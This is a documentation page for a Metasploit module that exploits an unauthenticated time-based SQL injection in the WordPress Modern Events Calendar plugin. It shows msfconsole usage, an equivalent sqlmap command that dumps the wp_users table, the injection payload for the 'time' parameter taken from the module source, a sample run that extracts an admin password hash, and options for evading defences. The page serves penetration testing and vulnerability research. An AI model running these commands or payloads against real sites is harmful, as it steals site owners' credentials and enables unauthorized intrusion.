WordPress Modern Events Calendar SQLi Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/wp_modern_events_calendar_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress Modern Events Calendar SQLi Scanner
Module: auxiliary/scanner/http/wp_modern_events_calendar_sqli
Source code: modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
Disclosure date: 2021-12-13
Last modification time: 2022-02-13 15:50:24 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-24946

Modern Events Calendar plugin contains an unauthenticated timebased SQL injection in versions before 6.1.5. The time parameter is vulnerable to injection.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/wp_modern_events_calendar_sqli
msf auxiliary(wp_modern_events_calendar_sqli) > show options
    ... show and set options ...
msf auxiliary(wp_modern_events_calendar_sqli) > set RHOSTS ip-range
msf auxiliary(wp_modern_events_calendar_sqli) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(wp_modern_events_calendar_sqli) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(wp_modern_events_calendar_sqli) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(wp_modern_events_calendar_sqli) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Modern Events Calendar plugin contains an unauthenticated timebased SQL injection in versions before 6.1.5. The time parameter is vulnerable to injection.

The plugin can be downloaded here

This module slightly replicates sqlmap running as:

sqlmap -u 'http:///wp-admin/admin-ajax.php?action=mec_load_single_page&time=2' -p "time" --technique T -T wp_users -C user_login,user_pass --dump --dbms mysql

Verification Steps


  1. Install the plugin, use defaults
  2. Start msfconsole
  3. Do: use auxiliary/scanner/http/wp_modern_events_calendar_sqli
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get the users and hashes returned.

Options


ACTION: List Users

This action lists COUNT users and password hashes.

COUNT


If action List Users is selected (default), this is the number of users to enumerate. The larger this list, the more time it will take. Defaults to 1.

Scenarios


Modern Events Calendar 6.1.0 on Wordpress 5.7.5 on Ubuntu 20.04

resource (calendar.rb)> use auxiliary/scanner/http/wp_modern_events_calendar_sqli
resource (calendar.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (calendar.rb)> set verbose true
verbose => true
resource (calendar.rb)> run
[*] Checking /wp-content/plugins/modern-events-calendar-lite/readme.txt
[*] Found version 6.1.0 in the plugin
[+] Vulnerable version of Modern Events Calendar detected
[*] {SQLi} Executing (select group_concat(FMuxps) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) FMuxps from wp_users limit 1) tXKksULcj)
[*] {SQLi} Encoded to (select group_concat(FMuxps) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xde,0)),ifnull(user_pass,repeat(0x79,0))) as binary) FMuxps from wp_users limit 1) tXKksULcj)
[*] {SQLi} Time-based injection: expecting output of length 40
admin
$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/wp_modern_events_calendar_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/wp_modern_events_calendar_sqli

msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > show info

       Name: WordPress Modern Events Calendar SQLi Scanner
     Module: auxiliary/scanner/http/wp_modern_events_calendar_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-12-13

Provided by:
  h00die
  Hacker5preme (Ron Jost)
  red0xff

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Available actions:
  Name        Description
  ----        -----------
  List Users  Queries username, password hash for COUNT users

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COUNT      1                no        Number of users to enumerate
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  Modern Events Calendar plugin contains an unauthenticated timebased 
  SQL injection in versions before 6.1.5. The time parameter is 
  vulnerable to injection.

References:
  https://www.exploit-db.com/exploits/50687
  https://nvd.nist.gov/vuln/detail/CVE-2021-24946
  https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md
  https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445

Module Options


This is a complete list of options available in the scanner/http/wp_modern_events_calendar_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > show options

Module options (auxiliary/scanner/http/wp_modern_events_calendar_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COUNT      1                no        Number of users to enumerate
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Auxiliary action:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/wp_modern_events_calendar_sqli auxiliary module:

msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > show advanced

Module advanced options (auxiliary/scanner/http/wp_modern_events_calendar_sqli):

   Name                  Current Setting                      Required  Description
   ----                  ---------------                      --------  -----------
   DOMAIN                WORKSTATION                          yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                 no        Conform to IIS, should work for most servers. Only set to fals
                                                                        e for non-IIS servers
   FingerprintCheck      true                                 no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                          no        HTTP connection and receive timeout
   HttpPassword                                               no        The HTTP password to specify for authentication
   HttpRawHeaders                                             no        Path to ERB-templatized raw headers to append to existing head
                                                                        ers
   HttpTrace             false                                no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                              no        HTTP request and response colors for HttpTrace (unset to disab
                                                                        le)
   HttpTraceHeadersOnly  false                                no        Show HTTP headers only in HttpTrace
   HttpUsername                                               no        The HTTP username to specify for authentication
   SSLVersion            Auto                                 yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23
                                                                         are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1,
                                                                        TLS1.1, TLS1.2)
   ShowProgress          true                                 yes       Display progress messages during a scan
   ShowProgressPercent   10                                   yes       The interval in percent that progress should be shown
   SqliDelay             1.0                                  no        The delay to sleep on time-based blind SQL injections
   UserAgent             Mozilla/5.0 (iPad; CPU OS 15_3_1 li  no        The User-Agent header to use for all requests
                         ke Mac OS X) AppleWebKit/605.1.15 (
                         KHTML, like Gecko) Version/15.2 Mob
                         ile/15E148 Safari/604.1
   VERBOSE               false                                no        Enable detailed status messages
   WORKSPACE                                                  no        Specify the workspace for this module
   WPCHECK               true                                 yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                           yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/wp_modern_events_calendar_sqli module can do:

msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > show actions

Auxiliary actions:

   Name        Description
   ----        -----------
   List Users  Queries username, password hash for COUNT users

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/wp_modern_events_calendar_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/wp_modern_events_calendar_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space
                                                            , tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: spac
                                                            e, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random
                                                            , hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server not online or not detected as wordpress


Here is a relevant code snippet related to the "Server not online or not detected as wordpress" error message:

47:	    ]
48:	  end
49:	
50:	  def check_host(_ip)
51:	    unless wordpress_and_online?
52:	      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
53:	    end
54:	
55:	    checkcode = check_plugin_version_from_readme('modern-events-calendar-lite', '6.1.5')
56:	    if checkcode == Msf::Exploit::CheckCode::Safe
57:	      return Msf::Exploit::CheckCode::Safe('Modern Events Calendar version not vulnerable')

Modern Events Calendar version not vulnerable


Here is a relevant code snippet related to the "Modern Events Calendar version not vulnerable" error message:

52:	      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
53:	    end
54:	
55:	    checkcode = check_plugin_version_from_readme('modern-events-calendar-lite', '6.1.5')
56:	    if checkcode == Msf::Exploit::CheckCode::Safe
57:	      return Msf::Exploit::CheckCode::Safe('Modern Events Calendar version not vulnerable')
58:	    end
59:	
60:	    print_good('Vulnerable version of Modern Events Calendar detected')
61:	    checkcode
62:	  end

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

74:	          'action' => 'mec_load_single_page',
75:	          # taken from sqlmap
76:	          'time' => "#{Rex::Text.rand_text_numeric(1)}) AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND (#{d}=#{d}"
77:	        }
78:	      })
79:	      fail_with Failure::Unreachable, 'Connection failed' unless res
80:	    end
81:	    unless @sqli.test_vulnerable
82:	      fail_with Failure::PayloadFailed, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay."
83:	    end
84:	

<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay.


Here is a relevant code snippet related to the "<PEER> - Testing of SQLi failed. If this is time based, try increasing SqliDelay." error message:

77:	        }
78:	      })
79:	      fail_with Failure::Unreachable, 'Connection failed' unless res
80:	    end
81:	    unless @sqli.test_vulnerable
82:	      fail_with Failure::PayloadFailed, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay."
83:	    end
84:	
85:	    columns = ['user_login', 'user_pass']
86:	    results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
87:	    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die
  • Hacker5preme (Ron Jost)
  • red0xff

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.